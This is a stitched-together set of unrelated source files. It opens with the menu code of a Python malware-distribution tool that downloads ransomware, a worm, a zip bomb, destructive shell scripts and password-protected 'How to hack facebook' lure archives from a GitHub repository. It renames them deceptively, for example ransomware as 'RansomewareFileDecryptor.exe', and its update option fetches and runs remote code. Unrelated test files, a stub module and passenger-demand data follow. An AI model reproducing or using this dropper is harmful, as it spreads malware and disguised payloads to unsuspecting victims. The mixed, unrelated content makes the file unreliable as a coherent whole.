os.system("mv 'reg-eater.bat?raw=true' Windows/Reg-eater.bat")
print(fun)#####done
elif menu3 == 4:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/kuis.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'kuis.bat?raw=true' Windows/Kuis.bat")
print(fun)#####done
elif menu3 == 5:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/koce.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'koce.bat?raw=true' Windows/Koce.bat")
print(fun)#####done
elif menu3 == 6:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/cmd.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'cmd.bat?raw=true' Windows/Cmd.bat")
print(fun)#####done
elif menu3 == 7:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/capslock.vbs?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'capslock.vbs?raw=true' Windows/Capslock.vbs")
print(fun)#####done
elif menu3 == 8:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/alay.vbs?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'alay.vbs?raw=true' Windows/Alay.vbs")
print(fun)#####done
elif menu3 == 9:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/ransomeware.exe?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'ransomeware.exe?raw=true' Windows/RansomewareFileDecryptor.exe")
print(fun)#####done
elif menu3 == 10:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/RIP.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'RIP.bat?raw=true' Windows/RIP.bat")
print(fun)#####done
elif menu3 == 11:
print("\n")
menu()
else:
print(""+R+"[!] wrong number")
except Exception:
print(""+R+"[!] This is not number")
#######################Done PC
####################start PDF
def Vpdfautorunpc():
print(""+O+"["+R+"1"+O+"] How to hack facebook (ext: rar)")
print(""+O+"["+R+"2"+O+"] Hack facebook (ext: rar)")
print(""+O+"["+R+"3"+O+"] Back")
try:
menu4 = input("Input Number >"+R+" ")
if menu4 == 1:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/howtohackfb.rar?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'howtohackfb.rar?raw=true' Pdf-autorun-windows/How-to-hack-facebook.rar")
print(fun)#####done
print("password: cracker\n")
elif menu4 == 2:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/hackfacebook.rar?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'hackfacebook.rar?raw=true' Pdf-autorun-windows/Hack-facebook.rar")
print(fun)#####done
print("password: cracker\n")
elif menu4 == 3:
print("\n")
menu()
else:
print(""+R+"[!] Wrong number")
except NameError:
print(""+R+"[!] This is not number")
except Exception as err:
print(""+R+"[!] This is not number")
######################Done pdf
############Worm and Bomb zip
def Vother():
print(""+O+"["+R+"1"+O+"] Worm.bat")
print(""+O+"["+R+"2"+O+"] Bomb.zip")
print(""+O+"["+R+"3"+O+"] Back")
try:
menu5 = input("Input number > "+R+"")
if menu5 == 1:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/worm.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'worm.bat?raw=true' Worm-and-Bombzip/worm.bat")
print(fun)#####done
elif menu5 == 2:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/bom-zip.zip?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'bom-zip.zip?raw=true' Worm-and-Bombzip/Bomb.zip")
print(fun)#####done
elif menu5 == 3:
print("\n")
menu()
else:
print(""+R+"[!] wrong number")
except Exception:
print(""+R+"[!] This is not number")
###############Start Shell Virus
def Shellvirus():
print(""+O+"["+R+"1"+O+"] Data-Eater.sh")
print(""+O+"["+R+"2"+O+"] Bootloop.sh")
print(""+O+"["+R+"3"+O+"] Back")
try:
menu6 = input("Input number > "+R+"")
if menu6 == 1:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/data-eater.sh?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'data-eater.sh?raw=true' Shell-virus/Data-Eater.sh")
print(fun)#####done
elif menu6 == 2:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/bootloop.sh?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'bootloop.sh?raw=true' Shell-virus/Bootloop.sh")
print(fun)#####done
elif menu6 == 3:
print("\n")
menu()
else:
print(""+R+"[!] wrong number")
except Exception:
print(""+R+"[!] This is not number")
def banner2():
print(""+G+"Please do"+R+" NOT "+G+"use this tool for illegal activity")
print(""+R+"[!] "+G+"Keep legal don't illegal "+R+" [!]"+O+"")
def menu():
print("\n"+R+"[========== Menu ==========]"+O+"")
print(""+O+"["+R+"1"+O+"] Android\t\t["+R+"4"+O+"] Pdf Autorun PC\t\t["+R+"7"+O+"] Update tool")
print(""+O+"["+R+"2"+O+"] Macosx\t\t["+R+"5"+O+"] Other\t\t\t["+R+"8"+O+"] About")
print(""+O+"["+R+"3"+O+"] Windows\t\t["+R+"6"+O+"] Shell\t\t\t["+R+"9"+O+"] Exit")
try:
menu = input("\nInput Number > "+R+"")
if menu == 1:
os.system("clear")
Vandroid()
elif menu == 2:
os.system("clear")
Vmacosx()
elif menu == 3:
os.system("clear")
vpcwin()
elif menu == 4:
os.system("clear")
Vpdfautorunpc()
elif menu == 5:
os.system("clear")
Vother()
elif menu == 6:
os.system("clear")
Shellvirus()
elif menu == 7:
os.system("clear")
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Hider5/Malicious/blob/master/malicious.py?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'malicious.py?raw=true' malicious.py")
os.system("python2 malicious.py")
elif menu == 8:
os.system("clear")
about()
elif menu == 9:
fontcolor()
os.system("clear")
sys.exit()
else:
print(""+R+"[!] wrong number")
except Exception:
print(""+R+"[!] This is not number")
if __name__ == "__main__":
os.system("clear")
banner()
banner2()
menu()
fontcolor()
sys.exit()
# File: chopro/utils.py (repo: nomike/pychopro, license: MIT)
from chopro.chopro2html import chopro2html
# File: tests/test_yubico/test_mfa.py (repo: TomVollerthun1337/logsmith, license: Apache-2.0)
from unittest import TestCase, mock
from unittest.mock import Mock, call

from app.yubico import mfa


def shell(command):
    if command == 'success_command':
        return True
    return False


class TestStart(TestCase):
    @mock.patch('app.yubico.mfa.shell')
    def test_fetch_mfa_token_from_shell__command_fails(self, m_shell):
        m_shell.run = Mock()
        m_shell.run.side_effect = shell

        self.assertEqual(None, mfa.fetch_mfa_token_from_shell('fail_command'))

        expected = [call('fail_command')]
        self.assertEqual(expected, m_shell.run.mock_calls)

    @mock.patch('app.yubico.mfa.shell')
    def test_fetch_mfa_token_from_shell(self, m_shell):
        m_shell.run = Mock()
        m_shell.run.return_value = '123456'

        self.assertEqual('123456', mfa.fetch_mfa_token_from_shell('success_command'))

        expected = [call('success_command')]
        self.assertEqual(expected, m_shell.run.mock_calls)

    @mock.patch('app.yubico.mfa.shell')
    def test_fetch_mfa_token_from_shell__command_succeeds_but_None_instead_of_token(self, m_shell):
        m_shell.run = Mock()
        m_shell.run.return_value = None

        self.assertEqual(None, mfa.fetch_mfa_token_from_shell('success_command'))

        expected = [call('success_command')]
        self.assertEqual(expected, m_shell.run.mock_calls)

    @mock.patch('app.yubico.mfa.shell')
    def test_fetch_mfa_token_from_shell__command_succeeds_but_no_valid_token(self, m_shell):
        m_shell.run = Mock()
        m_shell.run.return_value = 'Some Token 123456'

        self.assertEqual(None, mfa.fetch_mfa_token_from_shell('success_command'))

        expected = [call('success_command')]
        self.assertEqual(expected, m_shell.run.mock_calls)

    @mock.patch('app.yubico.mfa.shell')
    def test_fetch_mfa_token_from_shell__command_succeeds_token_has_spaces(self, m_shell):
        m_shell.run = Mock()
        m_shell.run.return_value = '   123456   '

        self.assertEqual('123456', mfa.fetch_mfa_token_from_shell('success_command'))

        expected = [call('success_command')]
        self.assertEqual(expected, m_shell.run.mock_calls)

    @mock.patch('app.yubico.mfa.shell')
    def test_fetch_mfa_token_from_shell__no_command(self, m_shell):
        self.assertEqual(None, mfa.fetch_mfa_token_from_shell(''))

        expected = []
        self.assertEqual(expected, m_shell.run.mock_calls)
# tests/datasets/test_maestro.py (mirdata, BSD-3-Clause)
import os
import shutil

import pretty_midi
import numpy as np

from mirdata.datasets import maestro
from mirdata import annotations, download_utils
from tests.test_utils import run_track_tests

def test_track():
    default_trackid = "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1"
    data_home = "tests/resources/mir_datasets/maestro"
    dataset = maestro.Dataset(data_home)
    track = dataset.track(default_trackid)

    expected_attributes = {
        "track_id": "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1",
        "midi_path": os.path.join(
            data_home,
            "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1.midi",
        ),
        "audio_path": os.path.join(
            data_home, "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1.wav"
        ),
        "canonical_composer": "Alban Berg",
        "canonical_title": "Sonata Op. 1",
        "year": 2018,
        "duration": 698.661160312,
        "split": "train",
    }

    expected_property_types = {
        "notes": annotations.NoteData,
        "midi": pretty_midi.PrettyMIDI,
        "audio": tuple,
    }

    assert track._track_paths == {
        "audio": [
            "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1.wav",
            "1694d8431f01eeb2a18444196550b99d",
        ],
        "midi": [
            "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1.midi",
            "4901b1578ee4fe8c1696e02f60924949",
        ],
    }

    run_track_tests(track, expected_attributes, expected_property_types)

    # test audio loading functions
    audio, sr = track.audio
    assert sr == 48000
    assert audio.shape == (48000 * 2,)

def test_load_metadata():
    data_home = "tests/resources/mir_datasets/maestro"
    dataset = maestro.Dataset(data_home)
    metadata = dataset._metadata

    default_trackid = "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1"
    assert metadata[default_trackid] == {
        "canonical_composer": "Alban Berg",
        "canonical_title": "Sonata Op. 1",
        "split": "train",
        "year": 2018,
        "midi_filename": "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1.midi",
        "audio_filename": "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1.wav",
        "duration": 698.661160312,
    }

def test_download_partial(httpserver):
    data_home = "tests/resources/mir_datasets/maestro_download"
    if os.path.exists(data_home):
        shutil.rmtree(data_home)

    httpserver.serve_content(
        open("tests/resources/download/maestro-v2.0.0.json", "r").read()
    )
    remotes = {
        "all": download_utils.RemoteFileMetadata(
            filename="1-maestro-v2.0.0.json",
            url=httpserver.url,
            checksum="d41d8cd98f00b204e9800998ecf8427e",
            unpack_directories=["maestro-v2.0.0"],
        ),
        "midi": download_utils.RemoteFileMetadata(
            filename="2-maestro-v2.0.0.json",
            url=httpserver.url,
            checksum="d41d8cd98f00b204e9800998ecf8427e",
            unpack_directories=["maestro-v2.0.0"],
        ),
        "metadata": download_utils.RemoteFileMetadata(
            filename="3-maestro-v2.0.0.json",
            url=httpserver.url,
            checksum="d41d8cd98f00b204e9800998ecf8427e",
        ),
    }
    dataset = maestro.Dataset(data_home)
    dataset.remotes = remotes

    dataset.download(None, False, False)
    assert os.path.exists(os.path.join(data_home, "1-maestro-v2.0.0.json"))
    assert not os.path.exists(os.path.join(data_home, "2-maestro-v2.0.0.json"))
    assert not os.path.exists(os.path.join(data_home, "3-maestro-v2.0.0.json"))

    if os.path.exists(data_home):
        shutil.rmtree(data_home)
    dataset.download(["all", "midi"], False, False)
    assert os.path.exists(os.path.join(data_home, "1-maestro-v2.0.0.json"))
    assert not os.path.exists(os.path.join(data_home, "2-maestro-v2.0.0.json"))
    assert not os.path.exists(os.path.join(data_home, "3-maestro-v2.0.0.json"))

    if os.path.exists(data_home):
        shutil.rmtree(data_home)
    dataset.download(["metadata", "midi"], False, False)
    assert not os.path.exists(os.path.join(data_home, "1-maestro-v2.0.0.json"))
    assert os.path.exists(os.path.join(data_home, "2-maestro-v2.0.0.json"))
    assert not os.path.exists(os.path.join(data_home, "3-maestro-v2.0.0.json"))

    if os.path.exists(data_home):
        shutil.rmtree(data_home)
    dataset.download(["metadata"], False, False)
    assert not os.path.exists(os.path.join(data_home, "1-maestro-v2.0.0.json"))
    assert not os.path.exists(os.path.join(data_home, "2-maestro-v2.0.0.json"))
    assert os.path.exists(os.path.join(data_home, "3-maestro-v2.0.0.json"))

def test_download(httpserver):
    data_home = "tests/resources/mir_datasets/maestro_download"
    if os.path.exists(data_home):
        shutil.rmtree(data_home)

    # download the full dataset
    httpserver.serve_content(
        open("tests/resources/download/maestro-v2.0.0.zip", "rb").read()
    )
    remotes = {
        "all": download_utils.RemoteFileMetadata(
            filename="maestro-v2.0.0.zip",
            url=httpserver.url,
            checksum="625180ffa41cd9f2ab7252dd954b9e8a",
            unpack_directories=["maestro-v2.0.0"],
        )
    }
    dataset = maestro.Dataset(data_home)
    dataset.remotes = remotes
    dataset.download(None, False, False)

    assert os.path.exists(data_home)
    assert not os.path.exists(os.path.join(data_home, "maestro-v2.0.0"))
    assert os.path.exists(os.path.join(data_home, "maestro-v2.0.0.json"))
    assert os.path.exists(
        os.path.join(
            data_home,
            "2004/MIDI-Unprocessed_XP_22_R2_2004_01_ORIG_MID--AUDIO_22_R2_2004_04_Track04_wav.wav",
        )
    )
    assert os.path.exists(
        os.path.join(
            data_home,
            "2004/MIDI-Unprocessed_XP_22_R2_2004_01_ORIG_MID--AUDIO_22_R2_2004_04_Track04_wav.midi",
        )
    )

    # test downloading again
    dataset.download(None, False, False)

    if os.path.exists(data_home):
        shutil.rmtree(data_home)

    # test downloading twice with cleanup
    dataset.download(None, False, True)
    dataset.download(None, False, False)

    if os.path.exists(data_home):
        shutil.rmtree(data_home)

    # test downloading twice with force overwrite
    dataset.download(None, False, False)
    dataset.download(None, True, False)

    if os.path.exists(data_home):
        shutil.rmtree(data_home)

    # test downloading twice with force overwrite and cleanup
    dataset.download(None, False, True)
    dataset.download(None, True, False)

    if os.path.exists(data_home):
        shutil.rmtree(data_home)

    # download the midi-only zip
    httpserver.serve_content(
        open("tests/resources/download/maestro-v2.0.0-midi.zip", "rb").read()
    )
    remotes = {
        "midi": download_utils.RemoteFileMetadata(
            filename="maestro-v2.0.0-midi.zip",
            url=httpserver.url,
            checksum="c82283fff347ed2bd833693c09a9f01d",
            unpack_directories=["maestro-v2.0.0"],
        )
    }
    dataset.remotes = remotes
    dataset.download(["midi"], False, False)

    assert os.path.exists(data_home)
    assert not os.path.exists(os.path.join(data_home, "maestro-v2.0.0"))
    assert os.path.exists(os.path.join(data_home, "maestro-v2.0.0.json"))
    assert not os.path.exists(
        os.path.join(
            data_home,
            "2004/MIDI-Unprocessed_XP_22_R2_2004_01_ORIG_MID--AUDIO_22_R2_2004_04_Track04_wav.wav",
        )
    )
    assert os.path.exists(
        os.path.join(
            data_home,
            "2004/MIDI-Unprocessed_XP_22_R2_2004_01_ORIG_MID--AUDIO_22_R2_2004_04_Track04_wav.midi",
        )
    )

    # test downloading again
    dataset.download(["midi"], False, False)

    if os.path.exists(data_home):
        shutil.rmtree(data_home)

    # download only the metadata
    httpserver.serve_content(
        open("tests/resources/download/maestro-v2.0.0.json", "rb").read()
    )
    remotes = {
        "metadata": download_utils.RemoteFileMetadata(
            filename="maestro-v2.0.0.json",
            url=httpserver.url,
            checksum="d41d8cd98f00b204e9800998ecf8427e",
        )
    }
    dataset.remotes = remotes
    dataset.download(["metadata"], False, False)

    assert os.path.exists(data_home)
    assert not os.path.exists(os.path.join(data_home, "maestro-v2.0.0"))
    assert os.path.exists(os.path.join(data_home, "maestro-v2.0.0.json"))
    assert not os.path.exists(
        os.path.join(
            data_home,
            "2004/MIDI-Unprocessed_XP_22_R2_2004_01_ORIG_MID--AUDIO_22_R2_2004_04_Track04_wav.wav",
        )
    )
    assert not os.path.exists(
        os.path.join(
            data_home,
            "2004/MIDI-Unprocessed_XP_22_R2_2004_01_ORIG_MID--AUDIO_22_R2_2004_04_Track04_wav.midi",
        )
    )

    # test downloading again
    dataset.download(["metadata"], False, False)

    if os.path.exists(data_home):
        shutil.rmtree(data_home)
# terrascript/data/ciscoasa.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:14:03 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.data.ciscoasa
#
# instead of
#
# >>> import terrascript.data.hashicorp.ciscoasa
#
# This is only available for 'official' and 'partner' providers.
from terrascript.data.hashicorp.ciscoasa import *
# test/test_add_contact_to_group.py (kochetov-a/python_training, Apache-2.0)
from model.group import Group
from model.contact import Contact
from fixture.orm import ORMFixture
import random

orm = ORMFixture(host="127.0.0.1", name="addressbook", user="root", password="")


# Test adding a contact to a group (the contact is not yet in that group)
def test_add_contact_to_group(app, db):
    if len(db.get_group_list()) == 0:  # if the database has no groups, create one
        app.group.create(Group(name="TestNameForGroup", header="TestHeaderForGroup", footer="TestFooterForGroup"))
    if len(db.get_contact_list()) == 0:  # if the database has no contacts, create one
        app.contact.create(Contact(first_name="first_name_test", last_name="last_name_test"))
    group = random.choice(db.get_group_list())  # pick a random group from the list
    if len(orm.get_contacts_not_in_group(Group(id=group.id))) == 0:  # if every contact is already in this group
        app.contact.create(Contact(first_name="first_name_test_88", last_name="last_name_test_89"))  # create a new one
    # pick a contact that is NOT in the chosen group
    contact = random.choice(orm.get_contacts_not_in_group(Group(id=group.id)))
    old_groups = orm.get_contacts_in_group(Group(id=group.id))  # group membership BEFORE adding
    app.contact.add_to_group(contact.id, group.id)  # add the random contact to the random group
    new_groups = orm.get_contacts_in_group(Group(id=group.id))  # group membership AFTER adding
    old_groups.append(contact)  # the expected membership now includes the added contact
    # compare the group's membership before and after adding
    assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)


# Test adding a contact to a group it already belongs to
def test_add_contact_to_group_again(app, db):
    if len(db.get_group_list()) == 0:  # if the database has no groups, create one
        app.group.create(Group(name="TestNameForGroup", header="TestHeaderForGroup", footer="TestFooterForGroup"))
    if len(db.get_contact_list()) == 0:  # if the database has no contacts, create one
        app.contact.create(Contact(first_name="first_name_test", last_name="last_name_test"))
    group = random.choice(db.get_group_list())  # pick a random group from the list
    if len(orm.get_contacts_in_group(Group(id=group.id))) == 0:  # if this group has no contacts
        contact = random.choice(db.get_contact_list())  # pick a random contact from the list
        app.contact.add_to_group(contact.id, group.id)  # add it to this group
    contact = random.choice(orm.get_contacts_in_group(Group(id=group.id)))  # pick a random contact from the group
    old_groups = orm.get_contacts_in_group(Group(id=group.id))  # group membership BEFORE adding
    app.contact.add_to_group(contact.id, group.id)  # add the contact to the group again
    new_groups = orm.get_contacts_in_group(Group(id=group.id))  # group membership AFTER adding
    # compare the group's membership before and after adding
    assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
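Both assertions sort with `Group.id_or_max`, a key that must tolerate objects whose `id` may be unset so that the comparison is order-insensitive but stable. A hypothetical sketch of such a helper (the real `Group` lives in `model.group`; this stand-in and its key are assumptions for illustration only):

```python
import sys


class Group:
    """Minimal stand-in for model.group.Group, just enough to show the sort key."""

    def __init__(self, id=None, name=None):
        self.id = id
        self.name = name

    @classmethod
    def id_or_max(cls, obj):
        # Sort by numeric id; objects without an id sort last.
        return int(obj.id) if obj.id else sys.maxsize
```

With this key, `sorted(items, key=Group.id_or_max)` puts persisted objects in id order and unsaved ones at the end, so two lists with the same members compare equal regardless of the order the ORM returned them in.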
# curator/validators/__init__.py (rprabhat/curator, Apache-2.0)
from .schemacheck import SchemaCheck
# instances/passenger_demand/pas-20210422-1717-int14000000000000001e/19.py
# (LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure, BSD-3-Clause)
"""
PASSENGERS
"""
numPassengers = 27098
passenger_arriving = (
(5, 5, 3, 0, 3, 4, 0, 2, 6, 1, 1, 1, 0, 4, 13, 6, 6, 10, 5, 4, 1, 1, 2, 0, 1, 0), # 0
(10, 10, 14, 5, 5, 3, 2, 4, 7, 2, 1, 1, 0, 9, 6, 5, 6, 7, 6, 1, 2, 2, 1, 0, 0, 0), # 1
(7, 7, 5, 10, 8, 3, 5, 0, 3, 0, 0, 1, 0, 7, 9, 6, 6, 7, 0, 3, 2, 2, 2, 0, 0, 0), # 2
(7, 5, 7, 7, 2, 8, 2, 1, 2, 1, 0, 1, 0, 9, 10, 6, 8, 6, 3, 2, 1, 1, 5, 0, 2, 0), # 3
(13, 4, 5, 13, 6, 6, 3, 5, 3, 2, 1, 1, 0, 10, 7, 7, 5, 8, 3, 2, 3, 6, 1, 0, 2, 0), # 4
(5, 6, 3, 10, 4, 3, 3, 2, 5, 4, 2, 1, 0, 9, 9, 9, 5, 9, 11, 4, 4, 3, 5, 0, 3, 0), # 5
(7, 12, 9, 10, 11, 2, 3, 6, 7, 0, 3, 0, 0, 12, 8, 10, 6, 7, 5, 5, 3, 5, 5, 1, 1, 0), # 6
(12, 10, 8, 10, 3, 6, 6, 3, 5, 1, 1, 2, 0, 13, 6, 7, 6, 12, 1, 2, 2, 6, 4, 2, 0, 0), # 7
(13, 9, 9, 12, 4, 2, 3, 0, 4, 0, 2, 1, 0, 9, 10, 12, 2, 13, 4, 4, 1, 3, 3, 1, 3, 0), # 8
(9, 11, 7, 10, 4, 3, 6, 6, 6, 3, 1, 0, 0, 11, 5, 11, 10, 8, 6, 6, 8, 7, 3, 1, 0, 0), # 9
(14, 8, 13, 9, 6, 4, 2, 6, 7, 1, 2, 1, 0, 14, 7, 6, 12, 6, 6, 2, 4, 4, 2, 1, 0, 0), # 10
(9, 7, 6, 11, 12, 2, 7, 2, 1, 1, 1, 1, 0, 9, 12, 8, 7, 10, 7, 6, 4, 9, 0, 0, 2, 0), # 11
(14, 10, 13, 14, 13, 6, 5, 9, 7, 0, 3, 1, 0, 12, 3, 7, 7, 17, 9, 2, 0, 3, 4, 2, 0, 0), # 12
(7, 12, 7, 8, 9, 4, 4, 5, 4, 3, 1, 2, 0, 10, 11, 8, 7, 12, 8, 6, 7, 3, 5, 1, 1, 0), # 13
(16, 11, 10, 12, 10, 6, 6, 2, 8, 1, 1, 1, 0, 19, 12, 8, 8, 8, 7, 6, 4, 4, 8, 2, 1, 0), # 14
(18, 17, 10, 11, 10, 4, 10, 3, 4, 3, 3, 1, 0, 9, 13, 10, 10, 6, 5, 7, 7, 1, 4, 4, 2, 0), # 15
(18, 15, 18, 14, 3, 4, 4, 8, 2, 4, 0, 1, 0, 16, 8, 11, 7, 9, 7, 10, 2, 4, 3, 5, 1, 0), # 16
(8, 14, 14, 11, 10, 2, 6, 3, 4, 0, 2, 1, 0, 10, 13, 12, 11, 13, 7, 8, 5, 5, 6, 2, 0, 0), # 17
(18, 11, 12, 13, 14, 4, 5, 4, 4, 1, 2, 0, 0, 12, 17, 11, 8, 9, 3, 6, 6, 3, 4, 2, 1, 0), # 18
(8, 13, 13, 9, 11, 6, 3, 9, 6, 2, 0, 2, 0, 15, 13, 4, 7, 8, 7, 2, 4, 3, 5, 3, 0, 0), # 19
(14, 23, 11, 12, 11, 2, 3, 3, 6, 7, 2, 2, 0, 10, 16, 16, 7, 14, 10, 5, 4, 4, 3, 2, 3, 0), # 20
(12, 16, 14, 12, 18, 6, 3, 6, 7, 4, 2, 0, 0, 12, 12, 4, 13, 8, 6, 7, 2, 5, 3, 0, 2, 0), # 21
(17, 13, 7, 12, 9, 5, 5, 0, 3, 3, 2, 1, 0, 17, 12, 13, 8, 13, 8, 8, 5, 5, 4, 3, 2, 0), # 22
(19, 14, 15, 14, 13, 5, 4, 8, 6, 1, 1, 5, 0, 17, 15, 8, 13, 11, 5, 8, 3, 6, 6, 1, 2, 0), # 23
(7, 15, 11, 15, 13, 1, 9, 7, 4, 5, 5, 1, 0, 17, 12, 11, 9, 11, 7, 3, 3, 6, 4, 0, 3, 0), # 24
(17, 13, 12, 14, 14, 5, 6, 4, 5, 3, 1, 1, 0, 21, 12, 11, 8, 6, 7, 7, 5, 5, 5, 5, 0, 0), # 25
(12, 19, 12, 18, 11, 3, 5, 9, 3, 2, 3, 1, 0, 21, 16, 13, 2, 11, 6, 8, 3, 3, 5, 3, 1, 0), # 26
(12, 12, 12, 12, 9, 6, 5, 8, 6, 2, 5, 0, 0, 21, 20, 12, 4, 12, 10, 7, 5, 5, 7, 3, 1, 0), # 27
(18, 13, 12, 11, 10, 10, 3, 6, 7, 2, 1, 3, 0, 19, 14, 16, 6, 15, 6, 6, 5, 5, 1, 5, 1, 0), # 28
(16, 12, 16, 16, 10, 1, 4, 2, 12, 3, 1, 1, 0, 12, 15, 11, 9, 13, 8, 6, 2, 6, 4, 2, 2, 0), # 29
(15, 17, 14, 12, 14, 7, 8, 9, 7, 2, 3, 0, 0, 14, 15, 13, 7, 12, 3, 0, 2, 3, 3, 2, 0, 0), # 30
(12, 10, 9, 4, 7, 3, 8, 6, 6, 4, 0, 1, 0, 13, 15, 7, 13, 13, 7, 5, 6, 6, 2, 3, 0, 0), # 31
(15, 10, 12, 14, 13, 8, 7, 6, 8, 5, 2, 0, 0, 16, 12, 12, 11, 11, 9, 5, 4, 5, 1, 1, 3, 0), # 32
(16, 12, 14, 12, 10, 6, 5, 7, 3, 1, 4, 1, 0, 13, 13, 9, 7, 15, 6, 7, 4, 4, 4, 1, 1, 0), # 33
(13, 19, 12, 12, 14, 3, 7, 5, 4, 1, 1, 0, 0, 16, 12, 13, 6, 6, 5, 8, 2, 2, 4, 4, 2, 0), # 34
(19, 11, 12, 9, 9, 4, 2, 4, 5, 1, 3, 2, 0, 8, 19, 7, 9, 14, 7, 6, 1, 8, 2, 3, 1, 0), # 35
(10, 14, 13, 14, 6, 6, 7, 6, 6, 2, 1, 1, 0, 10, 12, 6, 12, 10, 6, 3, 1, 2, 2, 2, 0, 0), # 36
(14, 18, 7, 15, 9, 5, 6, 6, 6, 2, 1, 2, 0, 10, 10, 9, 12, 8, 8, 4, 2, 7, 8, 3, 1, 0), # 37
(18, 14, 13, 23, 8, 3, 1, 6, 9, 1, 3, 2, 0, 13, 15, 16, 8, 15, 7, 6, 7, 9, 6, 5, 1, 0), # 38
(13, 20, 12, 16, 14, 6, 6, 2, 5, 3, 1, 0, 0, 11, 15, 10, 5, 10, 7, 3, 4, 2, 3, 1, 0, 0), # 39
